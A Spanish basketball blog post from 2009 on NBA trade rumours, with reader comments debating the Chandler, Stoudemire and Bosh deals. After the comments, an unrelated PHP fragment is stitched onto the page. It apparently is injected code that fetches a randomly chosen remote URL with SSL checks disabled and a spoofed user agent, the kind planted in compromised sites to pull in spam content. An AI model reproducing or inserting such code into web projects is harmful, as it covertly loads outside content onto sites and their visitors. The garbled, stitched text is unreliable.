¿Amare a Toronto y Bosh a los Bulls?

18 de February de 2009 por txusma

El futuro de Amare Stoudamire (y el de los Suns) en general es posiblemente el mayor interrogante que se ha de desvelar antes de que se acabe la fase de traspasos en la NBA. Durante el AllStar apareció la posibilidad de que recalará en Cleveland y junto con Lebron James intentará luchar por el anillo de campeón. Ayer la posibilidad que más se comentaba era la de un traspaso a 3 bandas entre Chicago, Toronto y los Suns. Toronto se haría con los servicios del ala-pívot de los Suns, Chicago con los de Chris Bosh y Phoenix con Drew Gooden (expiring de 7 millones), Tyrus Thomas y una primera ronda del draft. De momento, los Suns han celebrado los rumores con el posiblemente mejor partido de la temporada: 140-100 contra los Clippers.

El traspaso que sí se ha confirmado es el de otro nombre que estaba en el disparadero: Tyson Chandler, junto con los derechos de DeVon Hardin, se va a los Thunder a cambio de Chris Wilcox y Joe Smith. Puede sorprender en primer momento que un equipo con las aspiraciones de los Hornets traspase a su pívot “estrella” a cambio de un par de teóricos buenos jugadores. No nos dejemos deslumbrar por la temporada pasade de Chandler. Este año, con muchos problemas físicos, su actuación está siendo bastante pobre (9 puntos, 8 rebotes) y presumo que tanto Wilcox como titular (¿o Hilton Armstrong?) como smith como suplente aportarán conjuntamente en muchas más facetas del juego de las que lo hacía hasta ahora Chandler. Y además los Hornets han conseguido 10 millones en expiring que seguro van a rentabilizar.

Para acabar, de manera sorprendente se rumorea un Vince Carter x Tracy McGrady. Con este traspaso los Nets también se apuntarían a la moda del 2010.

Comenta

10 comentarios a esta entrada

  1. txetxu dice:
    #1

    mcgrady se pierde toda la temporada por lesion, se opera la rodilla izda. igual eso hace q el traspaso se vaya al garete.

      Citar

  2. Viva_Dirk dice:
    #2

    No pierden casi nada con el trade los Hornets. Chandler este año esta flojísimo y con problemas físicos, Wilcox es un tio al que Paul puede sacarle mucho partido y Joe Smith es una buena pieza.

    Oklahoma supongo que estará pensando en adaptarse a los posibles agentes libres(Boozer, Okur, Gordon) y al draft(Griffin, Harden). Chandler si cuaja alguna temporada como la anterior les hace un papelón.

      Citar

  3. Txusma dice:
    #3

    Y a todo esto Cassell traspasado a los Kings a cambio de una segunda ronda del 2015.

    Un WTF! en toda regla

      Citar

  4. Fran Reyes dice:
    #4

    @ Txus

    Boston quiere firmar a PJ Brown, que es agente libre, y para ello necesitaba hacerle hueco, tanto salarial como dentro de los 15 jugadores máximos en plantilla. Así, la idea de mandar a Cassell responde a quitarse 1’2 millones de euros de contrato del medio, y lo que han recibido… teniendo en cuenta que no le valía que llegaran jugadores… pues algo es algo, osche.

      Citar

  5. MagicJohnson32 dice:
    #5

    Los Celtics tenían la plantilla completa y así hacen hueco para un jugador. Ojito a Marbury.

    No sé, Viva, ni Wilcox ni Joe son lo que necesitan los Hornets. Chandler era fundamental en defensa. Y en ese aspecto, Wilcox y Joe Smith son como… yo, jeje. Está claro que lo hacen por motivos salariales. Para mí es un buen movimiento de OKC, que además liberarán este verano unos 17 kilos en morralla tipo Marshall y Swift.

      Citar

  6. Viva_Dirk dice:
    #6

    Bueno, creo que Joe Smith aunque no es un intimidador si es un defensor decente, eso si en el puesto de 4, no para tios grandes como lo era Chandler.

    Y visto el Chandler de esta temporada dices que era fundamental en que?

      Citar

  7. MagicJohnson32 dice:
    #7

    Parece cerrado un Salmons+Miller por Gooden+Nocioni.

      Citar

  8. TheDeerHunter dice:
    #8

    Lo de Chandler es un tema de pasta… clarísimo.

    Con Pau se rompió algún molde… y casi despellejan a Wallace, cuando se ha demostrado que hizo muy bien en aquella operación.

      Citar

  9. Viva_Dirk dice:
    #9

    Lo que salvo un poco aquel traspaso es que llegó Marc, pero vaya me parece que los Hornets no sacan poco.

    Ese trade que dice Magic confirma mi opinión de que los Bulls se meten en play-offs, Miller es un muy buen compañero para Thomas en el juego interior.

      Citar

  10. TheDeerHunter dice:
    #10

    Toma noticiaca:
    Los médicos de los Thunder han hecho cancelar el traspaso de Chandler.

    No hay traspaso. Ni bueno ni malo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>